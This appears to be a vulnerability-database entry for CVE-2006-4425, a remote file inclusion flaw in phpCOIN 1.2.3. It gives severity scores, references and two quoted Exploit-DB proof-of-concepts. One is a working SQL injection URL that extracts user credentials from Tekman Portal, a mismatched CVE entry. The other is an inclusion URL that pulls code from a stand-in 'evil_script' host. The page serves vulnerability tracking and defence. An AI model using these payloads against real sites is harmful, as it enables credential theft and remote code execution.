CVE-2006-4425
Published 2006-08-29
Priority: P4 (33) · CVSS 2.0: 5.1 (medium)
Vector: AV:N/AC:H/Au:N/C:P/I:P/A:P
Exploit: available
EPSS: 4.03% (89.3rd percentile)
Multiple PHP remote file inclusion vulnerabilities in phpCOIN 1.2.3 allow remote attackers to execute arbitrary PHP code via the _CCFG[_PKG_PATH_INCL] parameter in coin_includes scripts including (1) api.php, (2) common.php, (3) core.php, (4) custom.php, (5) db.php, (6) redirect.php or (7) session_set.php. NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| coinsoft_technologies | phpcoin | — | — |
No detection rules found.
Exploit-DB
CVE-2006-4916: Tekman Portal 1.0 - 'tr' SQL Injection
exploitdb · 2006-09-19
---
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Tekman Portal v1.0 (tr) SQL Injection Vulnerability +
+ Author : Fix TR +
+ Site : www.hack.gen.tr +
+ Contact : fixtr[at]bsdmail.com +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Download: http://www.aspindir.com/goster/4425
+ Version : 1.0
+ Bug In : uye_profil.asp
+ Risk : High
+ Exp.
http://[Target]/[Path]/uye_profil.asp?uye_id=1+union+select+1,kadi,null,seviye,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+uyeler+Where+seviye+like+2
# milw0rm.com [2006-09-19]
Exploit-DB
CVE-2006-4425: PHPCOIN 1.2.3 - 'session_set.php' Remote File Inclusion
exploitdb · 2006-08-24
---
phpCOIN 1.2.3 (_CCFG[_PKG_PATH_INCL]) Remote Include Vulnerability
##################################################################
Discovered by: Timq
http://www.securitydb.org
##################################################################
Email: timq[at]hackernetwork[dot]com
http://www.securitydb.org
##################################################################
Vulnerable: require_once include ($_CCFG['_PKG_PATH_INCL'].'redirect.php');
###################################################################
Exploit PoC:
http://www.site.com/[path]/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://evil_script?
http://www.site.com/[path]/includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://evil_script?
Dork:
No writeups or analysis indexed.
References
http://secunia.com/advisories/21624
http://www.osvdb.org/28219
http://www.osvdb.org/28220
http://www.osvdb.org/28221
http://www.osvdb.org/28222
http://www.osvdb.org/28223
http://www.osvdb.org/28224
http://www.osvdb.org/28225
http://www.vupen.com/english/advisories/2006/3385
https://exchange.xforce.ibmcloud.com/vulnerabilities/28572